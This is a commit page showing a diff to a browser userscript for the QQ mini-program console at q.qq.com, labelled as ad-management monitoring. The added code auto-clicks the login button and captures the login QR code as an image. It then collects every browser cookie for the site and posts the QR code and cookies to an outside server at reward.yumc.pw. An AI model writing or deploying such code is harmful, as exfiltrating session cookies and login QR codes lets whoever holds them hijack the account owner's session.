1
0
Fork 0

更新 'qq/q.user.js'

master
502647092 2021-05-31 02:11:17 +00:00
parent 30276d9567
commit 8110433f0d
1 changed files with 27 additions and 17 deletions

View File

@ -1,7 +1,7 @@
// ==UserScript==
// @name QQ小程序授权上报
// @namespace https://qq.yumc.pw/
// @version 0.2
// @version 0.3
// @description report ad manage monitoring!
// @author MiaoWoo
// @match http*://q.qq.com
@ -10,26 +10,36 @@
(function () {
'use strict'
var logined = false
var taskId = undefined
async function post(path, data) {
return await fetch('https://reward.yumc.pw/callback/' + path, {
method: "POST",
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(data)
}).then(r => r.json())
}
async function reportQCookie() {
let path = location.hash.substr(1)
if (path == '/ad/manage' || path == '/home') {
let res = await fetch('https://q.qq.com/pb3/GetPreCacheUrl').then(r => r.json())
if (res.code == 0) {
clearInterval(taskId)
let cookies = document.cookie.split(';').map(s => s.trim().split('=', 2)).reduce((pre, cur, index) => {
pre[cur[0]] = cur[1]
return pre
}, {})
let report = await fetch('https://reward.yumc.pw/callback/qcookie', {
method: "POST",
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(cookies)
}).then(r => r.json())
console.log('小程序Cookie上报完毕', report)
if (path == '/') {
if (!document.getElementById('tcaptcha_iframe') && !logined) {
document.querySelector('.t-button--primary').click()
logined = true
}
return
}
if (path == '/loginqrcode') {
var canvers = document.querySelector('.app-qrcode__inner').children[0].children[0]
if (!canvers) { return }
clearInterval(taskId)
await post('qcode', { qrcode: canvers.toDataURL() })
let cookies = document.cookie.split(';').map(s => s.trim().split('=', 2)).reduce((pre, cur, index) => {
pre[cur[0]] = cur[1]
return pre
}, {})
console.log('小程序Cookie上报完毕', await post('qcookie', cookies))
}
}
taskId = setInterval(reportQCookie, 2000)